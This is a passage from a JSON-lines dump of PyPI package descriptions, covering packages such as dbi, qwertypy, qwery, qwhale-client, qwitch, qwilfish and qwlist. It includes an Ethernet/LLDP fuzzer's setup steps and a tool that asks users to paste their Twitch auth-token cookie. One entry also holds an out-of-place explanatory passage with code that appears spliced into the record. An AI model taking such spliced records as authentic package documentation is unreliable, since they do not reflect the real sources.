PyPI."} +{"package": "qwert", "pacakge-description": "Python extensionsInstallation$pip3installqwert"} +{"package": "qwert1234", "pacakge-description": "Example PackageThis is a simple example package. 
You can useGithub-flavored Markdownto write your content."} +{"package": "qwertasyx", "pacakge-description": "No description available on PyPI."} +{"package": "qwerty", "pacakge-description": "| BRANCH | BUILD STATUS | COVERAGE | REQUIREMENTS | ISSUES | OPEN PRs || --- | :---: | :---: | :---: | :---: | :---: || Master | [![Build Status](https://travis-ci.org/DrTexxOfficial/dbi.svg?branch=master)](https://travis-ci.org/DrTexxOfficial/dbi) | [![codecov](https://codecov.io/gh/DrTexxOfficial/dbi/branch/master/graph/badge.svg)](https://codecov.io/gh/DrTexxOfficial/dbi) | [![Requirements Status](https://requires.io/github/DrTexxOfficial/dbi/requirements.svg?branch=master)](https://requires.io/github/DrTexxOfficial/dbi/requirements/?branch=master) | [![GitHub issues](https://img.shields.io/github/issues/DrTexxOfficial/dbi.svg?branch=master)](https://GitHub.com/DrTexxOfficial/dbi/issues/) | [![GitHub pull-requests](https://img.shields.io/github/issues-pr/DrTexxOfficial/dbi.svg?branch=master)](https://GitHub.com/DrTexxOfficial/dbi/pull/) || Develop | [![Build Status](https://travis-ci.org/DrTexxOfficial/dbi.svg?branch=develop)](https://travis-ci.org/DrTexxOfficial/dbi) | [![codecov](https://codecov.io/gh/DrTexxOfficial/dbi/branch/develop/graph/badge.svg)](https://codecov.io/gh/DrTexxOfficial/dbi) | [![Requirements Status](https://requires.io/github/DrTexxOfficial/dbi/requirements.svg?branch=develop)](https://requires.io/github/DrTexxOfficial/dbi/requirements/?branch=develop)# Debug Interface - DBI[![PyPI Version](https://img.shields.io/pypi/v/dbi.svg)](https://pypi.python.org/pypi/dbi/)[![GitHub release](https://img.shields.io/github/release/drtexxofficial/dbi.svg)](https://GitHub.com/DrTexxOfficial/dbi/releases/)[![GitHub license](https://img.shields.io/github/license/DrTexxOfficial/dbi.svg?branch=master)](https://github.com/DrTexxOfficial/dbi/blob/master/LICENSE)[![Github all releases](https://img.shields.io/github/downloads/DrTexxOfficial/dbi/total.svg)](https://GitHub.com/DrTexxOfficial/dbi/releases/)\"dbi## Installation### Install via pipInstall as user (recommended):$ pip3 install dbi --userInstall as root:$ sudo pip3 install dbi### Install from sourceClone this repository:$ git clone https://github.com/DrTexxOfficial/dbi.gitInstall requirements:$ cd dbi$ pip3 install -r requirements.txt --user## Script Functionality### User-Written Verbosity-Dependant Debug Messages- information is only show when A and B are satisfied- debugging is active- the threshold verbosity is reached or exceeded (this threshold is specified on a per-message basis)- verbosity can be- set in advanced- **modified on-the-fly**- multiple **external functions** can be executed in a single-line- users can write their own debugging messages on the status of each function's progress- console output is colour-coded (based on verbosity levels)## What is the purpose?My console had become populated by indecernable walls of debugging text, all thanks to riddling my scripts with lines like `print(str(var),var)` for debugging.So I created a module to maintain my sanity and save my time.## ExamplesInitial config:```python3from dbi import Dbidbi = Dbi(3,True)dpm = dbi.print_message```Generic example:```[IN ]: dpm(2,\"message with\",\"sub-message\")[OUT]: [3][2]<=[2018-12-10 01:54:59.845995] message with | sub-message```
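To give a feel for how such verbosity-gated messages behave, the following is a small self-contained sketch of the same idea in plain Python. It mimics the output format of the example above, but it is not the actual Dbi implementation; the class and method names here are made up for illustration.

```python
from datetime import datetime

class VerbosityLogger:
    """Minimal sketch: a message prints only when debugging is enabled and
    the current verbosity meets the message's threshold."""

    def __init__(self, verbosity: int, debugging: bool = True):
        self.verbosity = verbosity        # can be changed on the fly
        self.debugging = debugging

    def print_message(self, threshold: int, *parts: str) -> None:
        if not self.debugging or self.verbosity < threshold:
            return                        # below threshold: stay silent
        stamp = datetime.now().strftime("%Y-%m-%d %H:%M:%S.%f")
        print(f"[{self.verbosity}][{threshold}]<=[{stamp}] " + " | ".join(parts))

log = VerbosityLogger(3, True)
log.print_message(2, "message with", "sub-message")   # printed, since 3 >= 2
log.print_message(5, "very chatty detail")            # suppressed, since 3 < 5
```

Keeping a per-message threshold against a single adjustable verbosity knob is what lets one setting silence the walls of debugging text described above.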
[![forthebadge made-with-python](http://ForTheBadge.com/images/badges/made-with-python.svg)](https://www.python.org/)"} +{"package": "qwertyenv", "pacakge-description": "qwertyenvGym environments (Reinforcement Learning)Black Jack (from RLBook2018)Collect Coins (Chess like)\"Ensure Valid Action\" Gym wrapper.\"Up/Down/Left/Right\" Gym wrapper - relevant for example for the Collect Coins environment when the piece is a rock.pip install qwertyenvExample usages for the Black Jack environment and for the Collect Coins environment can be found on github (the project's home)."} +{"package": "qwertyPOOL", "pacakge-description": "Qwerty POOLPOOL stands for Python Operating Other Languages.\nQwerty POOL is made to operate other languages such as java and implement different opportunities such as creating windows.InstallationYou can install Qwerty POOL fromPyPI:pip install qwertyPOOLOr you can install Qwerty POOL fromGithub:git clone https://github.com/pi-this/POOL.gitHow to useIf Java is not installed already use the following command to install it:import qwertyPOOL\nqwertyPOOL.java.jdk()\nqwerty.java.jre()Although Qwerty POOL's possibilities are short within version 1.0.0, it has the capability to display a window with text from javaTo open a window in Qwerty POOL:import qwertyPOOL\nqwertyPOOL.run.do()To Change the POOL icon:from qwertyPOOL import java as Lj\nLj.window.SetImage(\"face.png\")\nLj.window.open()\nLj.runj()To Add Text to the window:from qwertyPOOL import java as Lj\nLj.window.SetText(\"hello qwertyPOOL!\")\nLj.window.open()\nLj.runj()To View Qwerty POOL's version:qwertyPOOL.operating.version()Or:print(qwertyPOOL.__version__)To Wait in Qwerty POOL:qwertyPOOL.python.wait(2) # seconds"} +{"package": "qwertypy", "pacakge-description": "qwertypyPython utilities library for financial utilities, data analysis, visualization and DSA.Quick linksGithubPyPIDocsInstallationpipinstallqwertypyUpgradepipinstall--upgradeqwertypyUsageTry on colab:Click hereqwertypy.greetingsimportqwertypy.greetingsasqpyGreetingsprint(qpyGreetings.hello())qwertypy.tickertapeqwertypy.tickertape.companiesimportqwertypy.tickertape.companiesasttCompaniestopCompanies=ttCompanies.getTopCompanies()print(\"TOP = \",len(topCompanies))# print(\"ALL = \", len(ttCompanies.getAllCompanies()))ttName=\"reliance-industries-RELI\"companyInfo=ttCompanies.getCompanyInfo(ttName)print(companyInfo)qwertypy.tickertape.financialsimportqwertypy.tickertape.financialsasttFinancialsttName=\"reliance-industries-RELI\"forstatementTypeinttFinancials.statementTypes:statement=ttFinancials.getStatement(ttName,statementType)print(statementType,type(statement))ttName=\"reliance-industries-RELI\"statementType=ttFinancials.statementTypes[\"income\"]statement=ttFinancials.getStatement(ttName,statementType)yearsAndValues=ttFinancials.getYearsAndValues(statement,\"incDps\")print(yearsAndValues)qwertypy.data_analysisqwertypy.data_analysis.regressionimportqwertypy.data_analysis.regressionasqpyRegressionxTrain=[1,2,3,4,5,6]yTrain=[2,4,6,8,10,12]model=qpyRegression.QpyLinearRegression(xTrain,yTrain)model.train()yPredict=model.getPrediction()print(\"yPredict: \",yPredict)xPredict2=[10,11]yExpected=[20,22]yPredict2=model.getPrediction(xPredict2)print(\"yPredict2: 
\",yPredict2)qwertypy.data_plotsqwertypy.data_plots.trend_plotimportrandomimportqwertypy.data_plots.trend_plotasqpyTrendPlotxValues=[iforiinrange(10)]yValues=[random.randint(1,10)for_inrange(10)]xTicks=[\"xTick\"+str(i+1)foriinrange(10)]trendValues=list(yValues)qpyTrendPlot.trendPlot(xValues,yValues,xTicks=xTicks,rotateXTicks=90,xLabel=\"xLabel\",yLabel=\"yLabel\",plotTitle=\"plotTitle\",trendValues=trendValues,legends=[\"trendLegend\",\"barLegend\"],text=\"text\",textBackground=\"red\",watermark=\"watermark\",showValues=True,# saveToFile = \"testImage.jpg\")qwertypy.dsaqwertypy.dsa.single_source_shortest_pathfromcollectionsimportdefaultdictfromqwertypy.dsa.single_source_shortest_pathimportdijkstran=9edges=[(0,1,4),(0,7,8),(1,7,11),(1,2,8),(7,8,7),(7,6,1),(2,8,2),(8,6,6),(2,3,7),(2,5,4),(6,5,2),(3,5,14),(3,4,9),(5,4,10)]graph=defaultdict(lambda:defaultdict(int))foru,v,dinedges:graph[u][v]=graph[v][u]=dprint(dijkstra(graph,0,n))print(dijkstra(graph,1,n))qwertypy.dsa.all_pairs_shortest_pathfromcollectionsimportdefaultdictfromqwertypy.dsa.all_pairs_shortest_pathimportfwedges=[[1,2,3],[1,4,7],[2,1,8],[2,3,2],[3,1,5],[3,4,1],[4,1,2]]graph=defaultdict(dict)foru,v,costinedges:graph[u-1][v-1]=costfw(graph,len(graph))qwertypy.dsa.strongly_connected_componentsfromcollectionsimportdefaultdictfromqwertypy.dsa.strongly_connected_componentsimporttarjanedges=[[0,1],[2,0],[1,3],[3,4],[4,5],[5,6],[6,4]]graph=defaultdict(list)foru,vinedges:graph[u].append(v)low=tarjan(graph)print(\"low: \",low)scc=defaultdict(list)forkeyinlow:scc[low[key]].append(key)print(\"Strongly connected components: \",list(scc.values()))bridges=[]foru,vinedges:ifscc[u]!=scc[v]:bridges.append([u,v])print(\"Bridges: \",bridges)"} +{"package": "qwertysunnyday", "pacakge-description": "No description available on PyPI."} +{"package": "qwertyui", "pacakge-description": "No description available on PyPI."} +{"package": "qwertyuiopl", "pacakge-description": "\u0423\u0440\u0430 \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u0446\u0438\u044f!"} +{"package": "qwerty-weighted-levenshtein", "pacakge-description": "QWERTY WEIGHTED LEVENSHTEINImplementation of Levensthtein and Damerau-Levenshtein edit distances (and similarity) weighted on the QWERTY keyboard proximity.Not all edits are equal! Insertions and substitutions of characters should be considered differently if the characters are close to each other in a standard QWERTY keyboard.This library it gives different distances based on the closeness of characters in the keyboard and it returns the Levensthtein edit distance (insertion, deletion, substition of characters) as well as Damerau-Levenshtein distanceIt also provides similarity scores from 0.0 to 1.0 denoting how similar the two strings are.Installpip install qwerty-weighted-levenshteinUsageBasic use:fromqwerty_weighted_levenshteinimportqwerty_weighted_levenshteinqwerty_weighted_levenshtein(\"test\",\"pest\")# It returns 1.0 as it requires one substitution (t > p = 1.0)qwerty_weighted_levenshtein(\"test\",\"yest\")# It returns 0.7 as t and y are close in the keyboard (t > y = 0.7)More infoWeighting Edit Distance to\nImprove Spelling Correction in\nMusic Entity Search: Master's thesis of A. 
Samuellson implementing same principle for Spotify Search engine and showing correlation between physical position of keys on the keyboard and spelling mistakes/infoscout/weighted-levenshtein: Cython library implementing weighted Levensthein distance function.Damerau-Levenshtein distanceLicenseReleased under the MIT license.MIT License\n\nCopyright (c) 2022 Daniele Volpi\n\nPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is\nfurnished to do so, subject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in all\ncopies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\nSOFTWARE."} +{"package": "qwertywerty", "pacakge-description": "O2DESPyA python package to perform discrete event simulation.Usage"} +{"package": "qwertywerty123", "pacakge-description": "O2DESPyA python package that performs discrete event simulation"} +{"package": "qwertywertyerty12", "pacakge-description": "O2DESPyA python package to perform discrete event simulation.Usage"} +{"package": "qwery", "pacakge-description": "qweryqwery is a small and lightweight query builder based on asyncpg and pydantic.why a query builderIn my opinion query builders strike a great balance between the flexibility of raw SQL, the structure and safety of pre-crafted queries, and the comfortable data layer of an ORM.These benefits come with some downsides:You lose some flexibility when crafting queries, especially when dealing with things like partial updates.While the query builder interface does providesometyping, its dynamic nature means it can never match the safety of pre-crafted queries with hand-written or generated types.Complex queries returning non-standard data become unruly fast.model, queries, helper patternqwery works best with a model + queries + helper pattern, namely:Models describe only data and how it is storedQueries describe how models interact with the databaseHelpers describe and implement the interactionbetweenmodels and the application (creation, fetching, etc)examplefrompydanticimportBaseModelfromqweryimportQueryclassMyModel(BaseModel):classMeta:table_name=\"my_table\"id:intname:strdesc:Optional[str]active:boolclassMyModelQueries:create=Query(MyModel).insert(body=True).execute()delete_by_id=Query(MyModel).delete().where(\"id = {.id}\").execute()get_by_id=Query(MyModel).select().where(\"id = {.id}\").fetch_one()get_all=Query(MyModel).select().fetch_all()asyncwithpool.acquire()asconn:model=MyModel(id=1,name=\"test\",desc=None,active=True)awaitMyModelQueries.create(conn,model=model)model=awaitMyModelQueries.get_by_id(conn,id=1)models=awaitMyModelQueries.get_all(conn)assertmodels==[model]awaitMyModelQueries.delete(conn,id=1)"} +{"package": "qwest-git", "pacakge-description": "testqweweqeqw"} +{"package": 
"qwewxsadld", "pacakge-description": "No description available on PyPI."} +{"package": "qwgc", "pacakge-description": "qwgc is a quantum walk graph classifier for classification for Graph data."} +{"package": "qwgraph", "pacakge-description": "AboutThis is the source for the python packageqwgraph.\nThis package's aim is to provide an efficient implementation of quantum walks on graphs.The quantum walk model implemented in this package follows the paperhttps://arxiv.org/abs/2310.10451. This model is specifically designed for searching.Most of the critical functions of this package are implemented and compiled in rust, providing an efficient simulation.An example notebook can be found athttps://github.com/mroget/qwgraph/demo.ipynbInstallation1. From pippip install qwgraphFor windows users, it might be necessary to install the rust toolchain cargo.2. From sourcegit clone git@github.com:mroget/qwgraph.git\ncd qwgraph\n./build.shThe scriptbuild.shwill compile everything and install it as a python package locally on your machine. It requires to install maturin viapip install maturinDependencies+ `numpy`\n+ `matplotlib`\n+ `networkx`\n+ `pandas`\n+ `tqdm`DocumentationThe documentation can be found inhttps://mroget.github.io/qwgraph/"} +{"package": "qwh", "pacakge-description": "No description available on PyPI."} +{"package": "qwhale-client", "pacakge-description": "qwhale-clientThis is the official python client libraryThe library is simple, all you need is a TOKEN that you can get from our websitehareand that it! you are ready to work with our service.The library works withpymongoso you can use it like you use to.code examplefromqwhale_clientimportAPIClientTOKEN=\"\"client=APIClient(TOKEN)withclientasdatabase:print(client.activated)# -> Truedatabase[\"test\"].insert_one({\"key\":\"value\",\"extra\":\"123456\"})document=database[\"test\"].find_one({\"key\":\"value\"})print(document)# -> {\"_id\": ObjectId(...), \"key\": \"value\", \"extra\": \"123456\"}print(client.activated)# -> FalseAnother code examplefromqwhale_clientimportAPIClientTOKEN=\"\"client=APIClient(TOKEN)database=client.get_database()print(client.activated)# -> Truedatabase[\"test\"].insert_one({\"key\":\"value\",\"extra\":\"123456\"})document=database[\"test\"].find_one({\"key\":\"value\"})print(document)# -> {\"_id\": ObjectId(...), \"key\": \"value\", \"extra\": \"123456\"}print(client.close())# -> {'data_saved': True}print(client.activated)# -> False"} +{"package": "qwhale-logs-client", "pacakge-description": "QWhaleLogsClientQWhaleLogs client lib for saving logs in remote serviceInstall$>pipinstallqwhale-logs-clientGet tokenGo tologinAfter the login go toget_tokenLogging exampleimportloggingfromqwhale_logs_clientimportinitinit(token=\"\",batch_site=1)# Init logs capture# The batch site is determine how many logs to send in one request# For fewer sizes more requests are made (default to 100)logging.basicConfig(level=logging.DEBUG,format='%(asctime)s-%(name)s-%(levelname)s-%(message)s')logging.info(\"Some log\")# Normal use# Now your logs are sent to the QWhaleLogsServiceLoguru example (Recommended)fromloguruimportloggerfromqwhale_logs_clientimportinitinit(token=\"\",batch_site=1)# Init logs capture# The batch site is determine how many logs to send in one request# For fewer sizes more requests are made (default to 100)logger.info(\"Some log\")# normal use# Now your logs are sent to the QWhaleLogsService"} +{"package": "qwhatyTuring", "pacakge-description": "# Turing Machines in PythonVisit [the project 
page](https://github.com/qwhaty/Python-Turing-Machine) for more information"} +{"package": "qwhois", "pacakge-description": "whoiswhois\u67e5\u8be2\u670d\u52a1\u5305\u5b89\u88c5pipinstallqwhois\u4f7f\u7528fromqwhoisimportwhoisprint(whois('baidu.com'))"} +{"package": "qwif", "pacakge-description": "qwifGenerate QR codes for WIFI and more from the command line.Requirementspython 3.8+InstallingInstall and update usingpip:pip install -U qwifAlternatively, you can package and runqwifin a docker container:make imageUsageqwifsupports a number of QR code content types through subcommands.To generate a QR code for WIFI configuration:qwif wifi --ssid test --password testTo generate a QR code to configure e.g. Google Authenticator:qwif otp --secret test --issuer \"Big Corp\" --account_name test@test.localA list of subcommands can be printed by runningqwif --help.Each has its own help menu detailing the supported parameters for each QR code\ntype.Authorsiwaseatenbyagrue"} +{"package": "qwiic-exporter", "pacakge-description": "qwiic_exporterPrometheus exporter for SparkFun OpenLog Artemis QWIIC sensors, written in Python"} +{"package": "qwikcrud", "pacakge-description": "qwikcrudqwikcrudis a powerful command-line tool designed to enhance your backend development experience by automating the\ngeneration of comprehensive REST APIs and admin interfaces. Say goodbye to the tedious task of\nwriting repetitive CRUD (Create, Read, Update, Delete) endpoints when starting a new project, allowing developers to\nconcentrate on the core business logic and functionality.[!WARNING]\nThe generated application is not ready for production use. Additional steps are required to\nset up a secure and production-ready environment.Table of ContentsInstallationQuickstartEnvironment variablesUsageGenerated Application stackRoadmapContributingAcknowledgmentsLicenseInstallationpipinstallqwikcrudQuickstartEnvironment variablesBefore running the command-line tool, ensure the following environment variables are configured:GoogleexportGOOGLE_API_KEY=\"your_google_api_key\"OpenAIexportOPENAI_API_KEY=\"your_openai_api_key\"exportOPENAI_MODEL=\"your_openai_model\"# Defaults to \"gpt-3.5-turbo-1106\"UsageTo generate your application, open your terminal, run the following command and follow the instructions:Googleqwikcrud-ooutput_dirOpenAIqwikcrud-ooutput_dir--aiopenaiGenerated Application stackFastAPISQLAlchemy v2Pydantic v2Starlette-adminSQLAlchemy-fileExamplesTask\nManagement (prompt,generated app)Roadmapqwikcrudis designed to support various frameworks and AI providers. Here's an overview of what has been accomplished\nand\nwhat is planned for the future:FrameworksFastAPI + SQLAlchemyRestful APIsAdmin interfacesAuthenticationFastAPI + BeanieSpring BootAI providersGoogle (default)OpenAIAnthropicOllama (self-hosted LLMs)Pricingqwikcrudmakes one API call per prompt and add a system prompt of around 900 tokens to\nyour prompt.Google: Currently free.OpenAI: With the default gpt-3.5-turbo model, each app generation costs approximately $0.003. The exact cost can\nvary slightly based on the model selected and the output lengthContributingContributions are welcome and greatly appreciated! 
If you have ideas for improvements or encounter issues, please feel\nfree to submit a pull request or open an issue.AcknowledgmentsThe FastAPI + SQLAlchemy template is inspired by the excellent work\ninfull-stack-fastapi-postgresqlby [Sebastian Ramirez (tiangolo)].Licenseqwikcrudis distributed under the terms of theApache-2.0license."} +{"package": "qwikidata", "pacakge-description": "qwikidatais a Python package with tools that allow you to interact withWikidata.The package defines a set of classes that allow you to represent Wikidata entities\nin a Pythonic way. It also provides a Pythonic way to access three data sources,linked data interfacesparql query servicejson dumpQuick InstallRequirementspython >= 3.5Install with pipYou can install the most recent version using pip,pipinstallqwikidataQuick ExamplesPlease see the,examples folderORreadthedocsLicenseLicensed under the Apache 2.0 License. Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an \u201cAS IS\u201d BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.CopyrightCopyright 2019 Kensho Technologies, LLC.Important Linksreadthedocs|PyPI|github"} +{"package": "qwikstart", "pacakge-description": "qwikstart: Code generator for fun and profitDocumentation:https://qwikstart.readthedocs.ioSource:https://github.com/tonysyu/qwikstartqwikstartis a code generator for integrating code into existing projects. It\u2019s\nsimilar to code generators likecookiecutter,yeoman, andhygenbut with a focus on\nadding code to existing projects.A simplehello-world.ymlscript in qwikstart would look something like:steps:\"Askforname\":name:promptinputs:-name:\"name\"default:\"World\"\"Displaymessage\":name:echomessage:|Hello, {{ qwikstart.name }}!The first step uses thepromptoperation with a single input\"name\", with a default\nvalue of\"World\"(which is editable when running the script). The next step just uses\ntheechooperation to display a message. This script can be usingqwikstart run:$qwikstartrunhello-world.ymlPleaseenterthefollowinginformation:name:WorldHello,World!InstallThe recommended way of installingqwikstartis to usepipx:pipxinstallqwikstartIf you happen to be setting uppipxfor the first time, thepipx installation instructionssuggest runningpipx ensurepathto update\nthe user path. 
Note, if you use~/.profileinstead of~/.bash_profile,\nthis will add~/.bash_profile, which will take precendence over~/.profile.\nEither move the code from~/.bash_profileto~/.profileorlink your profiles.Basic UsageAfter installingqwikstart, you can run a simple hello-world example using the\nfollowing:$qwikstartrun--repohttps://github.com/tonysyu/qwikstartexamples/hello_world.ymlBy default, there are abbreviations for common git repos, so the above can also be\nwritten:qwikstartrun--repogh:tonysyu/qwikstartexamples/hello_world.ymlSee AlsoThere are a lot code generators and scaffolding tools out there, and the following is\njust a selection of some of the most popular ones:cookiecutter: A command-line utility that creates projects from cookiecutters\n(project templates)hygen: The scalable code generator that saves you time.yeoman: The web\u2019s scaffolding tool for modern webapps"} +{"package": "qwilfish", "pacakge-description": "IntroductionQwilfish is a Python package for fuzzing various Ethernet-related protocols.\nIt is a work in progress and the first goal is grammar-based generation of\nLLDP frames (IEEE 802.1AB).[[TOC]]InstallationPrerequisitesA Linux systemPython3.8 (higher versions will probably work too, but no guarantees)Root privileges (for changing the capabilities of Python binary)Create a virtual environmentIt is recommended to create a virtual environment first:$ python -m venv venv\n$ source venv/bin/activateInstall with pipTo install Qwilfish simply type:$ pip install qwilfishInstall from sourceTo install Qwilfish from source type:$ git clone https://gitlab.com/zluudg/qwilfish.git\n$ cd qwilfish\n$ pip install .Qwilfish also supports an editable install:$ pip install -e .Setting capabilitiesQwilfish writes packets to raw sockets, which is prohibited for normal users.\nIt is not recommended to install or run Qwilfish as root, however.\nInstead, change the capabilities of your Python binary:$ sudo setcap cap_net_raw=eip /path/to/python/binaryUsageBasic usageQwilfish can be invoked without any commands:$ qwilfishIt will then send one fuzzed LLDP packet on the loopback interface.To send ten packets on the loopback interface, type:$ qwilfish -c 10Set logging level to DEBUG:$ qwilfish -dAdvanced ConfigurationThere are some possibilities to configure a Qwilfish session beyond what is\noffered by the CLI. Please refer tothis guidefor more info.Writing PluginsCertain components in Qwilfish can be replaced in a plugin fashion. For more\ninfo check outthis guide.CreditThis project is more than heavily inspired byThe Fuzzing Book. Be sure to check it out!"} +{"package": "qwilprobe", "pacakge-description": "Welcome to Qwilprobe!"} +{"package": "qwitch", "pacakge-description": "QwitchQwitch is a CLI which allows you to watch streams and videos from Twitch directly in Quicktime on macOS.Avoid using unoptimized websites and enjoy Twitch simply via a few commands and the fast and reliable Quicktime player.\nThis also allows you to AirPlay your favorite livestreams and videos on other devices.RequirementsTo install Qwitch you will need to have installed Python >= 3.8 and the XCode Command Line Tools.What's beautiful is that you can get these two requirement installed with only one command since XCode Command Line Tools will also install a compatible version of python3. All you need to do is run the following commandxcode-select --installThis will prompt you to install XCode Command Line Tools on your environment. 
Now you should be able to run python and pip commands.InstallationQwitch is available via pip only. Simply run the following command to install it:pip3 install --user qwitchOnce that's done, you'll be able to use Qwitch directly in the terminal. On the first use, the CLI will ask you two things:The value of Twitch's auth-token cookieFor you to allow Qwitch to have access to a few things on your Twitch accountFirst, open your favorite web browser and log into your Twitch account. Then you'll need the value of the auth-token cookie. To grab it:Right-click anywhere on Twitch's webpageClick on \"Inspect Element\" or \"Inspect\"Navigate to the \"Storage\" or \"Application\" tab on the little window that openedExpand the \"Cookies\" folderClick on \"twitch.tv\"Search for the \"auth-token\" entry and copy its value (a 30-character string containing numbers and letters)Alternatively, you can use a browser extension like cookies.txt for Firefox. This will generate a text file in which you'll need to search for the \"auth-token\" entry.Well done! You'll need this to set up Qwitch.Now you can use Qwitch in the terminal and it will ask you for this token in due time. It will also prompt you to give it access to a few information from your Twitch account. To do so it will automatically open your web browser, you'll need to accept, and then copy and paste the URL of the page back to Qwitch.How to useHere are a few examples of how to achieve certain tasks with Qwitch:See which streamers you follow are live nowThis is rather simple, simply enter the command below:qwitch -sThe option-sis short for--streams. Qwitch will get the list of streamers you follow and display which ones are live now, with information about their stream.List the streamers you follow and their channel nameThis is rather simple, simply enter the command below:qwitch -fThe option-fis short for--follows. Qwitch will get the list of streamers you follow and display information about their channel.Most important information is their channel name displayed in red, which Qwitch needs when you search for their videos or streams.Watch this streamer's liveSay your favourite streamer is live and you want to watch their stream. Then all you'll need is the name of their channel. For example, if I want to watch Critical Role live, and I know the name of their channel iscriticalrolethen I use the following command to launch their livestream:qwitch -s criticalroleTo know your streamer's channel name either useqwitch -s, if they are live then the channel name will be written in red. Otherwise, look at Twitch's link to their channel. In Critical Role's example it would behttps://twitch.tv/criticalroleso their channel name iscriticalrole.Alternatively you can list the streamers you follow withqwitch -fand the channel names will be displayed in red.Watch this streamer's last videoYou can watch a streamer's last video with the-loption (short for--last), like so:qwitch -l channelnameand replacingchannelnameby the streamer's actual channel name.List a streamer's last 20 videosYou can list a streamer's last 20 videos with the-V(or--Videos) option, like so:qwitch -V channelnameand replacingchannelnameby the streamer's actual channel name.This will list the videos one by one, and ask you each time if you want to watch the video. 
Simply entery, for yes, orn, for no, and hit\u23ce Enter.Search and watch a streamer's videoTo search and watch one of the streamer's last 20 videos, you can use the-v(short for--vod) either with a video ID or by using keywords from the video's title.A video ID can be obtained from the video'stwitch.tvlink (e.g.https://twitch.tv/videos/524717693the video ID is524717693), or after usingqwitch -V channelnameto list channelname's last 20 videos. Once the video ID is obtained you can watch it with:qwitch -v wherehas to be replaced with the actual video ID (e.g.524717693).To search for a video with a keyword(s), specify the keyword in quotation marks followed by the channel name. Like so:qwitch -v \"some keywords\" channelnameThis will search for a video with the title containing exactlysome keywordsin channelname's last 20 videos. The keywords you use have to be an exact match (up to letter case) because Twitch does not have any search engine to search for videos.Adjust the video qualityYou can adjust a video's playback quality by telling Qwitch which video quality you want it to use. This is done by passing a video quality tag in the command (i.e. one of160p,360p,480p,720por1080p) like so:qwitch -s criticalrole 480pThis works with any qwitch command that can play a video.By default qwitch will use the best available quality. However, you can override this by setting thedefault-streamoption in Qwitch's config file.Qwitch's config fileQwitch's config file is located at~/Library/Application Support/qwitchand is namedconfig.json. This file contains two entries:The first one contains information about you as a twitch user (this stays on your system, Qwitch doesn't collect any of your information), i.e. your tokens to log into twitch from the CLIThe second one contains all theStreamlinkoptions that are needed to power QwitchYou can add Streamlink options to the second part of the config file in a JSON format. For example, you can add thedefault-streamStreamlink option to specify the default stream quality Qwitch should use. With this option, Qwitch's config file would look like[{\"client_id\":\"qwer9tyuiopasdf0ghjkllzxcv4bnm\",\"login\":\"username\",\"scopes\":[\"user:read:follows\",\"user_read\",\"user_subscriptions\"],\"user_id\":\"12345678\",\"expires_in\":4932814,\"access_token\":\"zxc6vbnm7asdfg3hjklqwert8yuiop\",\"requested_at\":1682178117},{\"twitch-api-header\":\"Authorization=OAuth asdfghjkl4qwertyui9nbvc2qwerty\",\"default-stream\":\"720p\"}]More options for Streamlink can be found on their website. Options that are boolean, need to be added in JSON format, i.e. you will need to specifyTrueorFalseas value for the key.Something wrong?If you find something's not right or you have some trouble setting things up, don't hesitate to create an issue on Qwitch's GitHub repository and I'll do my best to help you."} +{"package": "qwixtractor", "pacakge-description": "qwixtractorExtract data from the Quarterly Workforce IndicatorsInstallation$pipinstallqwixtractorUsageTODOContributingInterested in contributing? Check out the contributing guidelines. Please note that this project is released with a Code of Conduct. By contributing to this project, you agree to abide by its terms.Licenseqwixtractorwas created by Rodrigo Franco. 
It is licensed under the terms of the MIT license.Creditsqwixtractorwas created withcookiecutterand thepy-pkgs-cookiecuttertemplate."} +{"package": "qwlist", "pacakge-description": "Qwery ListQList is a small library introducing a new way to use higher order functions\nwith lists, withlazy evaluation. It also aims to address ugly\npython list methods such as map, filter and reduce. Whoever invented this:xs=['1','2','3','4']s=reduce(lambdaacc,x:acc+x,filter(lambdax:x<3,map(int,xs)),0)must reevaluate their life choices (yes, I am being cocky and most likely dumdum) but listen\nto me first and look what the world of lazy evaluation has to offer!xs=QList(['1','2','3','4'])s=xs.map(int).filter(lambdax:x<3).fold(lambdaacc,x:acc+x,0)As a bonus you getlen()method, so no longer will you be forced to wrapp your\nlists in this type of codelen(xs)and simply callxs.len()(I understand it is negligibly\nslower but look how much nicer it looks!)Quick tutorialLet's say we want to read numbers from a file and choose only the even ones. No problem at all!fromqwlistimportQListwithopen('path/to/file.txt','r')asfile:qlist=QList(file.readlines())even=qlist.map(int).filter(lambdax:x%2==0).collect()Why is there thiscollectat the end? Because all operations on the QList arelazy evaluated,\nso in order to finally apply all the operations you need to express that.There is also an eagerly evaluatedEagerQListin case all the actions performed on the list should\nbe evaluated instantaneously. This object is in theqwlist.eagermodule, but it is also\npossible to transformQListintoEagerQListsimply by callingeager()>>>fromqwlistimportQList>>>QList(range(3)).eager().map(str)['0','1','2']EagerQList has the same methods that QList has (filter,map,foreach, ...) but not lazy evaluated so\nthere is no need to callcollectat the end.ExamplesMaking QList from an iterable>>>QList([1,2,3,4])[1,2,3,4]Making QList from a generator>>>QList(range(3))[0,1,2]Making a list of pairs:intandstr>>>qlist=QList([1,2,3])>>>qlist.zip(qlist.map(str)).collect()[(1,'1'),(2,'2'),(3,'3')]Summing only the even numbers>>>QList(range(10)).filter(lambdax:x%2==0).fold(lambdaacc,x:acc+x,0)20Side noteThis syntax resemblesRustsyntax:RustPythonletxs=vec![1,2,3,4];letdouble_xs:Vec=xs.iter().map(|&x|x*2).collect();println!(\"{double_xs:?}\");// [2, 4, 6, 